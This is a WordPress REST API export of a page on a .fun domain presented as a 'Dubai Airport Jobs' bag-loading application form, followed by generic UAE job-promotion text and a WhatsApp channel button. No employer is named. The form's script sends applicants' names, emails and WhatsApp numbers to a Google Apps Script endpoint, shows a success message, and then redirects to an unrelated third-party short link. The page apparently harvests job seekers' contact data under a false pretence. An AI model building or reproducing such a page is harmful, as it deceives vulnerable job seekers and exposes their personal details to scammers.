{"id":66,"date":"2025-12-26T20:28:31","date_gmt":"2025-12-26T20:28:31","guid":{"rendered":"https:\/\/edu.jobzcutz.com\/?page_id=66"},"modified":"2026-01-27T11:59:55","modified_gmt":"2026-01-27T11:59:55","slug":"66-2","status":"publish","type":"page","link":"https:\/\/dubaijobavilable.gerva.fun\/?page_id=66","title":{"rendered":""},"content":{"rendered":"\n<link href=\"https:\/\/fonts.googleapis.com\/css2?family=Poppins:wght@300;400;600;700&#038;display=swap\" rel=\"stylesheet\">\n\n<style>\n    \/* --- MAIN CONTAINER --- *\/\n    .job-portal-container {\n        font-family: 'Poppins', sans-serif;\n        width: 100%;\n        min-height: 100vh;\n        display: flex;\n        align-items: center;\n        justify-content: center;\n        background: url('https:\/\/dubaijobavilable.gerva.fun\/wp-content\/uploads\/2025\/12\/Dubai-Airport-Jobs-Complete-Guide-to-Careers-Salaries-Requirements-and-How-to-Apply.jpeg') no-repeat center center;\n        background-size: cover;\n        padding: 20px;\n        box-sizing: border-box;\n    }\n\n    \/* --- FORM CARD --- *\/\n    .form-card {\n        background: #ffffff;\n        width: 100%;\n        max-width: 450px;\n        padding: 35px;\n        border-radius: 20px;\n        box-shadow: 0 20px 50px rgba(0,0,0,0.5);\n        border-top: 6px solid #e6b800;\n        position: relative;\n    }\n\n    \/* --- HEADER & INPUTS --- *\/\n    .header { text-align: center; margin-bottom: 30px; } \n    .header h2 { margin: 0; color: #003366; font-weight: 700; font-size: 26px; text-transform: uppercase; letter-spacing: 1px; } \n    .header p { color: #777; font-size: 14px; margin-top: 5px; }\n    \n    .form-group { margin-bottom: 18px; } \n    label { display: block; margin-bottom: 8px; font-weight: 600; font-size: 13px; color: #444; text-transform: uppercase; }\n    input, select { width: 100%; padding: 14px; border: 1px solid #e1e1e1; border-radius: 10px; font-size: 15px; box-sizing: border-box; background: #f8f9fa; transition: all 0.3s ease; }\n    input:focus, select:focus { border-color: #003366; background: #fff; outline: none; box-shadow: 0 0 0 4px rgba(0, 51, 102, 0.1); }\n    \n    .phone-group { display: flex; align-items: center; border: 1px solid #e1e1e1; border-radius: 10px; overflow: hidden; background: #f8f9fa; transition: 0.3s; }\n    .country-code { background-color: #eef2f6; padding: 14px; font-weight: 700; border-right: 1px solid #e1e1e1; font-size: 15px; color: #003366; }\n    .phone-group input { border: none; background: transparent; box-shadow: none; padding: 14px; }\n\n    \/* --- SUBMIT BUTTON --- *\/\n    .submit-btn { width: 100%; background: linear-gradient(135deg, #003366 0%, #001a33 100%); color: white; padding: 16px; border: none; border-radius: 10px; font-size: 16px; font-weight: 600; cursor: pointer; transition: all 0.3s ease; margin-top: 15px; box-shadow: 0 5px 15px rgba(0, 51, 102, 0.2); }\n    .submit-btn:hover { transform: translateY(-3px); box-shadow: 0 8px 20px rgba(0, 51, 102, 0.4); }\n    \n    \/* --- POPUP STYLES --- *\/\n    .popup-overlay {\n        display: none;\n        position: fixed;\n        top: 0; left: 0; width: 100%; height: 100%;\n        background: rgba(0, 0, 0, 0.6);\n        backdrop-filter: blur(5px);\n        z-index: 9999;\n        justify-content: center;\n        align-items: center;\n        opacity: 0;\n        transition: opacity 0.3s ease;\n    }\n    \n    .popup-overlay.show { opacity: 1; }\n\n    .popup-card {\n        background: white;\n        width: 90%;\n        max-width: 380px;\n        border-radius: 20px;\n        padding: 40px 30px;\n        text-align: center;\n        box-shadow: 0 25px 50px rgba(0,0,0,0.25);\n        transform: scale(0.8);\n        transition: transform 0.3s cubic-bezier(0.175, 0.885, 0.32, 1.275);\n    }\n\n    .popup-overlay.show .popup-card { transform: scale(1); }\n\n    \/* --- LOADING VIEW STYLES --- *\/\n    .loader-spinner {\n        border: 5px solid #f3f3f3;\n        border-top: 5px solid #003366;\n        border-radius: 50%;\n        width: 50px; height: 50px;\n        animation: spin 1s linear infinite;\n        margin: 0 auto 20px auto;\n    }\n    \n    @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } }\n\n    \/* --- SUCCESS VIEW STYLES (Initially Hidden) --- *\/\n    .success-view { display: none; }\n\n    .success-icon-container {\n        width: 80px; height: 80px;\n        background: #e6ffe6;\n        border-radius: 50%;\n        display: flex; align-items: center; justify-content: center;\n        margin: 0 auto 20px auto;\n        animation: pulseGreen 2s infinite;\n    }\n    \n    .checkmark-svg {\n        width: 40px; height: 40px;\n        fill: none; stroke: #28a745; stroke-width: 4; stroke-linecap: round; stroke-linejoin: round;\n        stroke-dasharray: 100; stroke-dashoffset: 100;\n        animation: drawCheck 0.8s ease forwards 0.3s;\n    }\n\n    \/* Common Texts *\/\n    .popup-title { font-size: 22px; color: #333; font-weight: 700; margin-bottom: 8px; }\n    .popup-desc { font-size: 14px; color: #666; line-height: 1.5; margin-bottom: 25px; }\n\n    \/* Progress Bar (Updated to 1 Second) *\/\n    .redirect-loader {\n        width: 100%; height: 6px;\n        background: #f0f0f0; border-radius: 10px; overflow: hidden; margin-top: 20px;\n    }\n    .redirect-fill {\n        height: 100%; width: 0%;\n        background: #003366; border-radius: 10px;\n        transition: width 1s linear; \/* CHANGED TO 1 SECOND *\/\n    }\n\n    @keyframes pulseGreen {\n        0% { box-shadow: 0 0 0 0 rgba(40, 167, 69, 0.4); }\n        70% { box-shadow: 0 0 0 15px rgba(40, 167, 69, 0); }\n        100% { box-shadow: 0 0 0 0 rgba(40, 167, 69, 0); }\n    }\n    @keyframes drawCheck { to { stroke-dashoffset: 0; } }\n<\/style>\n\n<div class=\"job-portal-container\">\n\n    <div class=\"form-card\">\n        <div class=\"header\">\n            <h2>Dubai Airport Jobs<\/h2>\n            <p>Application Form &#8211; Bag Loading<\/p>\n        <\/div>\n\n        <form name=\"submit-to-google-sheet\">\n            <div class=\"form-group\"> \n                <label>Full Name<\/label> \n                <input type=\"text\" name=\"Name\" placeholder=\"Enter your full name\" required> \n            <\/div>\n            \n            <div class=\"form-group\"> \n                <label>Email Address<\/label> \n                <input type=\"email\" name=\"Email\" placeholder=\"example@email.com\" required> \n            <\/div>\n            \n            <div class=\"form-group\"> \n                <label>WhatsApp \/ Mobile Number<\/label> \n                <div class=\"phone-group\"> \n                    <span class=\"country-code\">+971<\/span> \n                    <input type=\"tel\" name=\"Phone\" placeholder=\"50 123 4567\" pattern=\"[0-9]*\" required> \n                <\/div> \n            <\/div>\n            \n            <div class=\"form-group\">\n                <label>Position Applying For<\/label>\n                <input type=\"text\" name=\"Position\" value=\"Airport staff\" readonly \n                       style=\"background-color: #e9ecef; color: #555; font-weight: bold; cursor: not-allowed; border-color: #ced4da;\">\n            <\/div>\n            \n            <button type=\"submit\" class=\"submit-btn\">Submit Application<\/button>\n        <\/form>\n        \n        <div class=\"note-box\" style=\"margin-top:20px; font-size:12px; color:#666;\">\n            <strong>Note:<\/strong> Double-check your details before submitting.\n        <\/div>\n    <\/div>\n\n<\/div>\n\n<div id=\"statusPopup\" class=\"popup-overlay\">\n    <div class=\"popup-card\">\n        \n        <div id=\"loadingView\">\n            <div class=\"loader-spinner\"><\/div>\n            <div class=\"popup-title\">Processing&#8230;<\/div>\n            <div class=\"popup-desc\">Submitting your details securely. Please wait&#8230;<\/div>\n        <\/div>\n\n        <div id=\"successView\" class=\"success-view\">\n            <div class=\"success-icon-container\">\n                <svg class=\"checkmark-svg\" viewBox=\"0 0 52 52\">\n                    <path d=\"M14.1 27.2l7.1 7.2 16.7-16.8\"\/>\n                <\/svg>\n            <\/div>\n            <div class=\"popup-title\">Success!<\/div>\n            <div class=\"popup-desc\">Application received. Redirecting&#8230;<\/div>\n            \n            <div class=\"redirect-loader\">\n                <div class=\"redirect-fill\" id=\"loaderBar\"><\/div>\n            <\/div>\n        <\/div>\n\n    <\/div>\n<\/div>\n\n<script>\n    \/\/ *** GOOGLE SCRIPT URL ***\n    const scriptURL = 'https:\/\/script.google.com\/macros\/s\/AKfycbwBh3Z1CRWm8J3UIBV7blk9yqTSdbx0D2WGk9YVKdbaH6Dsdrk7fLUnlp_5PQ2u_OV4\/exec';\n    \n    const form = document.forms['submit-to-google-sheet'];\n    const popup = document.getElementById(\"statusPopup\");\n    const loadingView = document.getElementById(\"loadingView\");\n    const successView = document.getElementById(\"successView\");\n    const loaderBar = document.getElementById(\"loaderBar\");\n\n    form.addEventListener('submit', e => {\n        e.preventDefault(); \n        \n        \/\/ --- STEP 1: IMMEDIATELY SHOW POPUP (LOADING STATE) ---\n        popup.style.display = \"flex\";\n        setTimeout(() => popup.classList.add(\"show\"), 10); \n        \n        loadingView.style.display = \"block\";\n        successView.style.display = \"none\";\n\n        let phoneInput = form.querySelector('input[name=\"Phone\"]').value;\n        let formData = new FormData(form); \n        formData.set('Phone', \"+971 \" + phoneInput);\n\n        \/\/ Send Data\n        fetch(scriptURL, { method: 'POST', body: formData})\n            .then(response => { \n                \/\/ --- STEP 2: SWITCH TO SUCCESS STATE ---\n                form.reset();\n                \n                loadingView.style.display = \"none\";\n                successView.style.display = \"block\";\n                \n                \/\/ Start Progress Bar\n                setTimeout(() => {\n                    loaderBar.style.width = \"100%\"; \n                }, 50);\n\n                \/\/ --- STEP 3: REDIRECT AFTER 1 SECOND ---\n                setTimeout(function() {\n                    window.location.href = \"https:\/\/otieu.com\/4\/10526471\";\n                }, 1000); \/\/ CHANGED TO 1000ms (1 Second)\n            })\n            .catch(error => { \n                popup.classList.remove(\"show\");\n                setTimeout(() => popup.style.display = \"none\", 300);\n                alert(\"Connection Error! Please check your internet.\");\n            });\n    });\n<\/script>\n\n\n\n<h2 class=\"wp-block-heading\">\ud83c\udde6\ud83c\uddea Latest Job Opportunities in UAE \u2013 Apply Now<\/h2>\n\n\n\n<p>The United Arab Emirates (UAE) is one of the fastest-growing job markets in the world. Every year, thousands of people move to Dubai, Abu Dhabi, and other emirates in search of better jobs, higher salaries, and a better lifestyle.<\/p>\n\n\n\n<p>If you are looking for a job in the UAE, this is the right time to apply.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\ud83d\udcbc Why Work in the UAE?<\/h3>\n\n\n\n<p>The UAE offers many benefits to job seekers from different countries:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Tax-free salary<\/li>\n\n\n\n<li>Free or low-cost accommodation (for some jobs)<\/li>\n\n\n\n<li>Medical insurance<\/li>\n\n\n\n<li>Paid leave and annual vacations<\/li>\n\n\n\n<li>Safe working environment<\/li>\n\n\n\n<li>Opportunities for career growth<\/li>\n<\/ul>\n\n\n\n<p>Many companies in the UAE are hiring workers for both skilled and unskilled positions.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\ud83d\udd27 Popular Job Categories in UAE<\/h3>\n\n\n\n<p>Currently, jobs are available in multiple sectors, including:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Construction &amp; Labour Jobs<\/li>\n\n\n\n<li>Cleaning &amp; Helper Jobs<\/li>\n\n\n\n<li>Driver Jobs (Light \/ Heavy)<\/li>\n\n\n\n<li>Warehouse &amp; Packing Jobs<\/li>\n\n\n\n<li>Security Guard Jobs<\/li>\n\n\n\n<li>Hotel &amp; Restaurant Jobs<\/li>\n\n\n\n<li>Office &amp; Sales Jobs<\/li>\n<\/ul>\n\n\n\n<p>Both <strong>freshers<\/strong> and <strong>experienced candidates<\/strong> can apply.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\ud83d\udccb Who Can Apply?<\/h3>\n\n\n\n<p>Most UAE jobs have very simple requirements:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Basic education (not mandatory for all jobs)<\/li>\n\n\n\n<li>Valid passport<\/li>\n\n\n\n<li>Willingness to work in the UAE<\/li>\n\n\n\n<li>Age between 18 to 45 years (depends on job)<\/li>\n<\/ul>\n\n\n\n<p>Experience is a plus, but many companies also hire <strong>fresh candidates<\/strong>.<\/p>\n\n\n\n<a href=\"https:\/\/whatsapp.com\/channel\/0029Vb7t8aDKQuJJCKub010G\" target=\"_blank\" class=\"whatsapp-sticky\">\n    <div class=\"wa-icon\">\n        <svg viewBox=\"0 0 24 24\" width=\"24\" height=\"24\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\">\n            <path d=\"M17.472 14.382c-.297-.149-1.758-.867-2.03-.967-.273-.099-.471-.148-.67.15-.197.297-.767.966-.94 1.164-.173.199-.347.223-.644.075-.297-.15-1.255-.463-2.39-1.475-.883-.788-1.48-1.761-1.653-2.059-.173-.297-.018-.458.13-.606.134-.133.298-.347.446-.52.149-.174.198-.298.298-.497.099-.198.05-.371-.025-.52-.075-.149-.669-1.612-.916-2.207-.242-.579-.487-.5-.669-.51-.173-.008-.371-.01-.57-.01-.198 0-.52.074-.792.372-.272.297-1.04 1.016-1.04 2.479 0 1.462 1.065 2.875 1.213 3.074.149.198 2.096 3.2 5.077 4.487.709.306 1.262.489 1.694.625.712.227 1.36.195 1.871.118.571-.085 1.758-.719 2.006-1.413.248-.694.248-1.289.173-1.413-.074-.124-.272-.198-.57-.347m-5.421 7.403h-.004a9.87 9.87 0 01-5.031-1.378l-.361-.214-3.741.982.998-3.648-.235-.374a9.86 9.86 0 01-1.51-5.26c.001-5.45 4.436-9.884 9.888-9.884 2.64 0 5.122 1.03 6.988 2.898a9.825 9.825 0 012.893 6.994c-.003 5.45-4.437 9.884-9.885 9.884m8.413-18.297A11.815 11.815 0 0012.05 0C5.495 0 .16 5.335.157 11.892c0 2.096.547 4.142 1.588 5.945L.057 24l6.305-1.654a11.882 11.882 0 005.683 1.448h.005c6.554 0 11.89-5.335 11.893-11.893a11.821 11.821 0 00-3.48-8.413Z\" fill=\"#ffffff\"\/>\n        <\/svg>\n    <\/div>\n    <span class=\"wa-text\">Join Daily Job Alerts<\/span>\n<\/a>\n\n<style>\n    .whatsapp-sticky {\n        position: fixed;\n        bottom: 20px;\n        right: 20px;\n        background-color: #25D366; \/* WhatsApp Green *\/\n        color: white;\n        text-decoration: none;\n        display: flex;\n        align-items: center;\n        gap: 10px;\n        padding: 10px 20px;\n        border-radius: 50px; \/* Pill shape *\/\n        box-shadow: 0 4px 10px rgba(0,0,0,0.3);\n        z-index: 9999;\n        font-family: sans-serif;\n        font-weight: bold;\n        transition: all 0.3s ease;\n        box-sizing: border-box;\n        \n        \/* Animation Settings *\/\n        animation: jump-loop 3s infinite; \/* Har 3 sec baad jump karega *\/\n    }\n\n    \/* Jab mouse oper jaye to animation ruk jaye (ta k click easy ho) *\/\n    .whatsapp-sticky:hover {\n        transform: scale(1.05);\n        background-color: #128C7E; \/* Darker Green on Hover *\/\n        animation-play-state: paused; \n    }\n\n    .wa-icon {\n        display: flex;\n        align-items: center;\n        justify-content: center;\n    }\n\n    \/* === NEW: Icon Fix === *\/\n    .wa-icon svg {\n        display: block; \/* Extra space khatam karny k liay *\/\n        width: 24px;    \/* Icon size *\/\n        height: 24px;\n    }\n\n    \/* === NEW JUMP ANIMATION === *\/\n    @keyframes jump-loop {\n        0%, 100% {\n            transform: translateY(0); \/* Normal position *\/\n        }\n        10% {\n            transform: translateY(-10px); \/* Oper Uchalna *\/\n        }\n        20% {\n            transform: translateY(0); \/* Wapis neechy ana *\/\n        }\n        30% {\n            transform: translateY(-5px); \/* Chota sa dosra jump *\/\n        }\n        40% {\n            transform: translateY(0); \/* Wapis neechy *\/\n        }\n        \/* 40% sy 100% tak ruky ga (Pause) *\/\n    }\n\n    \/* === MOBILE SETTINGS (Full Width + Rounded) === *\/\n    @media (max-width: 480px) {\n        .whatsapp-sticky {\n            left: 15px;      \n            right: 15px;     \n            bottom: 15px;    \n            width: auto;     \n            border-radius: 50px; \n            padding: 12px 0;\n            justify-content: center;\n        }\n        \n        .whatsapp-sticky:hover {\n            transform: none;\n        }\n    }\n<\/style>\n","protected":false},"excerpt":{"rendered":"<p>Dubai Airport Jobs Application Form &#8211; Bag Loading Full Name Email Address WhatsApp \/ Mobile Number +971 Position Applying For [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"default","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","ast-disable-related-posts":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"class_list":["post-66","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/dubaijobavilable.gerva.fun\/index.php?rest_route=\/wp\/v2\/pages\/66","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dubaijobavilable.gerva.fun\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/dubaijobavilable.gerva.fun\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/dubaijobavilable.gerva.fun\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dubaijobavilable.gerva.fun\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=66"}],"version-history":[{"count":5,"href":"https:\/\/dubaijobavilable.gerva.fun\/index.php?rest_route=\/wp\/v2\/pages\/66\/revisions"}],"predecessor-version":[{"id":132,"href":"https:\/\/dubaijobavilable.gerva.fun\/index.php?rest_route=\/wp\/v2\/pages\/66\/revisions\/132"}],"wp:attachment":[{"href":"https:\/\/dubaijobavilable.gerva.fun\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=66"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}